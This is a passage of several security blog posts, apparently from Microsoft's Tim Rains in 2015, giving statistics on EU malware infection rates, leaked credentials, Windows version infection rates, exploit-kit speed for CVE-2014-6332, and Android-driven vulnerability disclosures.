Some locations in the EU saw great infection rate improvements in 2014. Figure 6 illustrates some of the biggest infection rate improvements in the region. France, Italy, Portugal, and Spain all ended 2014 with infection rates lower than the worldwide average after starting the year with significantly higher CCMs. Interestingly, over the years I have noticed elevated levels of Adware among these locations relative to the worldwide average, and the fourth quarter of 2014 was no different. With the exception of Portugal, these locations also all had elevated levels of Trojan Downloaders & Droppers during the last quarter of the year.

Figure 6: The largest CCM improvements in the EU in the second half of 2014
0629_Figure6

The most prevalent threat families found in the EU during the second half of 2014 are listed in Figure 7. Having only one commercial exploit kit (JS/Axpergle, also known as Angler) in the top ten threats in the region is good news as they are typically used by attackers to spread ransomware and other malware to unpatched systems. The top three threats in the EU in the fourth quarter of 2014 were all families of worms that typically spread through via unsecured file shares and removal media like USB drives.

Figure 7: The top 10 threat families in the EU in the second half of 2014
0629_Figure7

The good news is that many of these threats can be mitigated by keeping systems up-to-date with security updates and running up-to-date antimalware software. Could it be that locations in the EU that have relatively high malware infection rates also have relatively low antimalware software adoption/usage?

In part 3 of this series on the threat landscape in the EU I’m going to look at which locations in the EU have the highest and lowest usage of real-time antimalware software in the region – a key protection technology. I’m also going to examine which locations in the region host the most drive-by download attacks – a favorite malware distribution method for attackers.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

The Latest Picture of the Threat Landscape in the European Union – part 1

June 25th, 2015 No comments

I had the opportunity to visit with some European based customers when I spoke at the RSA Unplugged conference in London just a few weeks ago. Many of the customers I met with were very interested in a deep dive into the types of threats we see in the region. I have written about the threat landscape in Europe and European Union (EU) extensively over the years, including the articles below:

Ransomware is on the Rise, Especially in Europe
The Threat Landscape in the European Union at RSA Conference Europe 2013
European Union check-up: Locations with Lowest Infection Rates in the EU and What We Can Learn From Them
European Union Check-Up: Malicious Websites Hosted in the EU
European Union check-up: Romania still tops the list of most infected in the EU
Cyber-Threats in the European Union: First Half 2012
Cyber-Threats in the European Union
The Threat Landscape Shifts Significantly in the European Union – Part 1
The Threat Landscape Shifts Significantly in the European Union – Part 2
The Threat Landscape Shifts Significantly in the European Union – Part 3

I thought it was time to provide an updated view of the threat landscape in the region based on the latest data just released in the newest volume of the Microsoft Security Intelligence Report published just a few weeks ago.

Figure 1: Encounter rates in the region in the fourth quarter (4Q14) of 2014
 062515_Figure1

First, let’s look at the encounter rate (ER) among locations in Europe where we have sufficient data. ER is the percentage of computers running Microsoft real-time security software that report detecting malware or unwanted software during a given period of time. The worldwide average ER in the fourth quarter of 2014 was 15.9%. The average ER for the countries/regions that we have statistically significant data on in the EU was 20.8% during the same period.

As Figure 2 illustrates, in the third quarter of 2014 Bulgaria, Italy, Romania, and France had the highest ERs in the region. In the fourth quarter Bulgaria, Romania, Croatia and Latvia had the highest ERs in the EU. Bulgaria topped the list in both quarters as the location in the EU that encounters threats most often in the EU with an ER of 26% in the third quarter and 23% in the final quarter of 2014.

Figure 2: Encounter rates in the region in the third (3Q14) and fourth (4Q14) quarters of 2014
062515_Figure2

Taking a closer look at what types of threats are being encountered most often in Bulgaria reveals higher than average levels of Trojans, Obfuscators & Injectors, Exploits, Backdoors and Browser Modifiers – as seen in Figure 3. Figure 4 shows the top threat families encountered in Bulgaria in the fourth quarter of 2014.

Figure 3: (left) malware categories encountered in Bulgaria in the last quarter of 2014 compared to the worldwide averages; (right); unwanted software categories encountered in Bulgaria and worldwide during the last quarter of 2014
062515_Figure3

Figure 4: Top threat families encountered in the last quarter of 2014 in Bulgaria
062515_Figure4
Some of the locations with relatively high ERs, like Romania and Bulgaria, are also among the locations with the highest malware infection rates (CCM[1]) in the EU as Figure 5 illustrates; these are systems that encountered malware and were successfully infected. The worldwide average infection rate in the fourth quarter of 2014 was 5.9 systems infected with malware for every 1,000 scanned by the Malicious Software Removal Tool (MSRT) or 0.59% of the 600 – 700 million systems the MSRT executes on each month. The average infection rate for the 28 countries/regions in the EU during the same period was a CCM of 5.65 or 0.57%.

Figure 5: Locations in the EU with the highest malware infection rates (CCM) in the fourth quarter of 2014
062515_Figure5

Taking a closer look at Romania during this time period reveals some interesting insights. The infection rate there has consistently been significantly higher than the worldwide average and the vast majority of the 28 locations in the EU.

Figure 6: Encounter and infection rates for Romania during each quarter of 2014
062515_Figure6

The top threat found infecting systems in Romania in the last quarter of 2014 was Win32/Sality. What makes this interesting is that Sality is a virus (an old fashioned file infector) – I have written about why this seems remarkable before: Are Viruses Making a Comeback?

Figure 7: Threat families that infected systems in Romania most often in the last quarter of 2014
062515_Figure7

Another noteworthy data point is that the number of systems in Romania consistently running up to date antimalware software (67.4% of systems) is lower than the worldwide average (74.3%). Additionally, the number of systems in Romania consistently not running real-time anti-virus software (26% of systems) is higher than the worldwide average (19.1%).

Figure 8: Security software use in Romania in the last quarter of 2014
062515_Figure8

In the second part of this series on the threat landscape in the EU, I’ll examine the locations that have low encounter rates and low malware infection rates. Is there something we can learn from these countries/regions?

 

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

[1] Short for computers cleaned per mille (thousand). The number of computers cleaned for every 1,000 unique computers that run the MSRT. For example, if MSRT has 50,000 executions in a particular location in the first quarter of the year and removes infections from 200 computers, the CCM for that location in the first quarter of the year is 4.0 (200 ÷ 50,000 × 1,000).

The Risk of Leaked Credentials and How Microsoft’s Cloud Helps Protect Your Organization

June 18th, 2015 No comments

This week the Microsoft Identity and Security Services Division announced another new security report feature is now in preview that helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.

The Risk of Leaked Account Credentials
One scenario that has unfortunately become all too common is where account credentials are stolen in bulk by criminals through website breaches. Credentials are also unwittingly provided directly by the victims themselves through phishing attacks, or harvested from systems that are infected with malware. As we reported in the Microsoft Security Intelligence Report volume 17, account credentials that are stolen in bulk directly from organizations’ websites contribute a significant amount to the trade in stolen credentials. As part of its customer account protection operations during the period from November 2013 to June 2014, Microsoft tracked about 1,700 distinct website credential thefts, comprising a little more than 2.3 million credentials that were posted in public places on the Internet. This number represents only a small fraction of the credentials that are traded in forums and specialized websites on less publicly accessible spaces on the Internet that cater to the illicit trade in stolen credentials.

Figure 1: Number of publicly posted website credential thefts, per month, from November 2013 to June 2014

0618_fig1

Figure 2: Number of stolen credentials from publicly-posted credential thefts, per month, from November 2013 to June 2014. The spike in February represents includes the public posting of 1 million hashed credentials that had been stolen from Forbes[1]

0618_fig2

In addition to attacks on websites, a substantial number of the illicit account credentials trade is provided by devices infected with malware.

Figure 3: Trends for the most commonly encountered password stealers in the 1st half of 2014

0618_fig3

Security Mitigations in Microsoft’s Cloud Services that can Help
Last November I wrote about a unique capability built into Azure Active Directory Premium that allows customers to identify devices that have been compromised with some of the worst professionally managed threats on the Internet, and are attempting to sign into Azure based applications. This information allows customers to identify and remediate infected systems in their environments quickly.

Figure 4: An example report illustrating “sign ins from possibly infected devices” available to Microsoft Azure Active Directory Premium customers

0618_fig4

This week the Microsoft Identity and Security Services Division announced yet another new security report feature is now in preview that helps protect Azure Active Directory Premium customers from the risk associated with leaked credentials.

Figure 5: The new “Users with leaked credentials” report in the Azure management portal surfaces any matches between the leaked credentials lists that Microsoft discovers posted publically and your tenant

0618_fig5

You can get more details here: Azure Active Directory Premium reporting now detects leaked credentials.

Another security mitigation that can help to mitigate the risk of leaked credentials is multi-factor authentication. Typically, a user presents something they know, like their secret password, as proof of authenticity. The basic idea behind multi-factor authentication is for the user to present one or more additional proofs based on something they have, like a device for example, or something they are, such as a fingerprint or retinal scan.

Microsoft Azure and Office 365 already have multi-factor authentication support to help you manage this risk. You can get more details here: Azure Multi-Factor Authentication.

Many of the customers I talk to that manage on-premise environments have implemented some form of multi-factor authentication that helps protect their user accounts. But only a few customers I have talked to look for lists of leaked credentials and test them against their on-premise directory services. I suspect that the new “users with leaked credentials” report will be of high interest to many customers in a world where credential leakage and theft have become so commonplace.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

[1] A. Greenberg, “How The Syrian Electronic Army Hacked Us: A Detailed Timeline,” Forbes.com, 20.Feb.2014. [Online]. http://www.forbes.com/sites/andygreenberg/2014/02/20/how-the-syrian-electronic-army-hacked-us-a-detailed-timeline/. [Accessed: 17-Jul-2014].

Latest data shows newer versions of Windows have lower malware infection rates than older versions

May 19th, 2015 No comments

We released the latest volume of the Microsoft Security Intelligence Report last week. The latest data on how different versions of the Windows operating system are mitigating modern malware attacks suggests that newer versions are performing better than older versions.

The figure below illustrates the malware infection rates for Windows client and server operating systems in the third and fourth quarters of 2014 based on data from hundreds of millions of systems worldwide. This data is normalized, meaning the infection rate for each version of Windows is calculated by comparing an equal number of computers per version; for example, comparing 1,000 Windows Vista Service Pack 2 (SP2) based systems to 1,000 Windows 8.1 based systems in the fourth quarter of 2014 we can see 5.2 Windows Vista based systems infected with malware compared to 1.3 Windows 8.1 systems infected. In percentage terms, that’s equivalent to 0.52% of Windows Vista based systems (5.2/1,000*100 = 0.52) compared to 0.13% of Windows 8.1 based systems (1.3/1,000*100) infected with malware.

Figure: Infection rate by client and server operating system in the third and fourth quarters of 2014 (3Q14/4Q14)
2H14 CCM-OS

The newest versions of both Windows client and server operating systems had the lowest malware infection rates during the period, by a large margin.

Some of the CISOs and IT professionals I talk to use this operating system infection rate data to help make a business case for upgrading to newer, more secure software or deploying more secure service packs for their current platforms. As you can see from the latest data, newer is better across the board.

You can download this data in volume 18 of the Microsoft Security Intelligence Report at http://microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

The life and times of an exploit

May 18th, 2015 No comments

Just this week we released the latest Microsoft Security Intelligence Report that focuses on the threat landscape in the second half of 2014. The “featured intelligence” included in the new volume of the report examines the increased speed at which purveyors of commercial exploit kits are trying to take advantage of newly disclosed vulnerabilities, even in cases where security updates have been developed, released and deployed to hundreds of millions of systems around the world.

New exploits are appearing in commercial exploit kits faster
This new research shows us that such attackers are simply trying to take advantage of organizations that have lengthy or long lead time security update testing and deployment processes. Organizations with relatively slow or periodic security update deployment processes should use this research to evaluate whether their current processes continue to be effective at managing related risks or whether new efficiencies are warranted given the increased speed that some modern day attackers have been demonstrating recently. The research confirms what many of the CISOs and security professional I talk to already know: swiftly testing and applying security updates as they are released remains one of the best ways organizations can protect themselves from attacks.

Microsoft researchers used CVE-2014-6332, which was addressed in Security Bulletin MS14-064, as a case study. The vulnerability was reported to Microsoft, a security update was engineered and tested, and then deployed to hundreds of millions of systems around the world starting on Tuesday November 11th, 2014.

Tools that enable automated reverse engineering of security updates have been around for many years. But from past research we have seen that it can typically take several weeks or even months before such exploits appear as part of commercial exploit kits that attackers can rent or lease. In the second half of 2014 we saw that timeframe reduced dramatically. In the case of CVE-2014-6332 it was first observed being used in commercial exploit kits just 4 or 5 days after the first attacks in the wild were observed.
CVE-2014-6332

The Good News
The good news is that by the time these attacks started the security update, MS14-064, had been deployed to hundreds of millions of systems around the world making the exploit ineffective on them. Many organizations that practice rapid security update deployment processes were deploying the update before attackers could start broad attacks using exploit kits. For organizations that had slower deployment processes, Microsoft shared signature development guidance for CVE-2014-6332 with our Active Protections Program (MAPP) partners who released signatures at the same time Microsoft released MS14-064. This helps detect and block attacks using the vulnerability on unpatched systems, thus, in many cases, giving them more time to test and deploy the security update.

Deploying security updates quickly is the most effective mitigation
Once attackers have a working exploit they will continue to try to use it for years into the future. It’s important to promptly install all relevant security updates as soon as is practical as this remains one of the best ways to help defend users and systems against newly discovered threats. It also pays security dividends to use the products from MAPP partners as they work closely with Microsoft to help customers stay ahead of attackers.

You can get full details of this new research in volume 18 of the Microsoft Security Intelligence Report.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

Mass vulnerabilities in Android applications spike industry vulnerability disclosures in 4th Quarter 2014

May 14th, 2015 No comments

We have included data and analysis on industrywide vulnerability disclosures in the Microsoft Security Intelligence Report (SIR) for many years. We compile and analyze this information using vulnerability disclosure data that is published in the National Vulnerability Database (NVD) – the US government’s repository of standards-based vulnerability management data at nvd.nist.gov. The NVD represents all vulnerability disclosures that have a published Common Vulnerabilities and Exposures identifier (CVE).

The vulnerability disclosure data published in the just released volume of the SIR, volume 18, suggests that there was a 56.3% increase in vulnerability disclosures between the third and fourth quarters of 2014. After many periods of relatively small changes in disclosure totals, the 4,512 vulnerabilities disclosed during the second half of 2014 is the largest number of vulnerabilities disclosed in any half-year period since the CVE system was launched in 1999.

Figure 1: Industrywide vulnerability disclosures between the first half of 2012 (1H12) and the second half of 2014 (2H14)
2H14 Vulnerabilities

This large increase in disclosures is predominantly the result of work performed by the Computer Emergency Response Team (CERT) Coordination Center (CERT/CC) in the second half of 2014 to scan Android applications in the Google Play Store for man-in-the-middle vulnerabilities using an automated tool called CERT Tapioca.[1] CERT/CC determined that thousands of Android apps fail to properly validate SSL certificates provided by HTTPS connections, which could allow an attacker on the same network as an Android device to perform a man-in-the-middle attack on the device.[2]

This project resulted in the creation of almost 1,400 individual CVEs affecting thousands of different publishers of Android apps and code libraries. Without the Android application vulnerabilities discovered by CERT/CC, vulnerability disclosures across the entire industry would have increased about 8% in the second half of 2014 – which would be more consistent with the increases observed over the past several half-year periods.

All of the Android SSL vulnerabilities discovered by CERT/CC are medium-severity (CVSS scores from 4 to 7.9) and medium-complexity vulnerabilities that affect non-operating-system applications. This increased the number of medium-severity and medium-complexity vulnerability disclosures sharply compared to past periods. For example, medium-severity vulnerability disclosures increased from 59.6% of all vulnerabilities in the first half of 2014 to 72.5% in the second half of the year.

Figure 2: left: Industrywide vulnerability disclosures in the first half of 2014, by severity; right: left: Industrywide vulnerability disclosures in the second half of 2014, by severity
2H14 Vulnerability Severity

Medium-severity vulnerabilities accounted for almost the entire increase in disclosures seen in the last six months of 2014.

Figure 3: Industrywide vulnerability disclosures by severity, between the first half of 2012 (1H12) and the second half of 2014 (2H14)
2H14 Vulnerabilities by Severity

Some vulnerabilities are easier to exploit than others. Vulnerability complexity is an important factor to consider in determining the risk that each vulnerability poses. The CVSS assigns each vulnerability a complexity ranking of Low, Medium, or High. Medium-complexity vulnerabilities accounted for the largest category of disclosures in the second half of 2014 as well as the bulk of the significant increase in total disclosures observed during the period. Medium-complexity vulnerability disclosures doubled in the period between the first and second halves of 2014, increasing from 48.0% of all disclosures in the first half of the year to 61.5% in the second half of the year. Of note, disclosures of Low-complexity vulnerabilities (those that are the easiest to exploit) also increased significantly in the last six months of 2014. Low-complexity vulnerability disclosures increased 20.3% between the first and second halves of 2014, although their share of all vulnerabilities declined from 48.0% to 36.9% because of the sharp increase in Medium-complexity vulnerability disclosures in the same period.

Figure 4: Industrywide vulnerability disclosures by access complexity, between the first half of 2012 (1H12) and the second half of 2014 (2H14)
2H14 Vulnerabilities by Complexity

Many of the CISOs and security professionals I talk to are typically primarily concerned about vulnerabilities in operating systems and web browsers. But Figure 5 illustrates that there are typically more vulnerability disclosures in applications than in operating systems and browsers combined, and the almost 1,400 individual CVEs affecting thousands of different publishers of Android apps and code libraries accentuate this trend. Disclosures of vulnerabilities in applications other than web browsers and operating system applications increased 98.3% in the second half of 2014 and accounted for 76.5% of total disclosures for the period.

Figure 5: Industrywide operating system, browser, and application vulnerabilities, between the first half of 2012 (1H12) and the second half of 2014 (2H14)
2H14 Vulnerabilities by Type

You can get more details on vulnerability disclosure trends in the latest Microsoft Security Intelligence Report, available at http://microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

 

[1] Will Dormann, “Finding Android SSL Vulnerabilities with CERT Tapioca,” Cert/CC Blog, September 3, 2014, http://www.cert.org/blogs/certcc/post.cfm?EntryID=204.

[2] CERT Coordination Center, “Vulnerability Note VU#582497: Multiple Android applications fail to properly validate SSL certificates,” Vulnerability Notes Database, http://www.kb.cert.org/vuls/id/582497.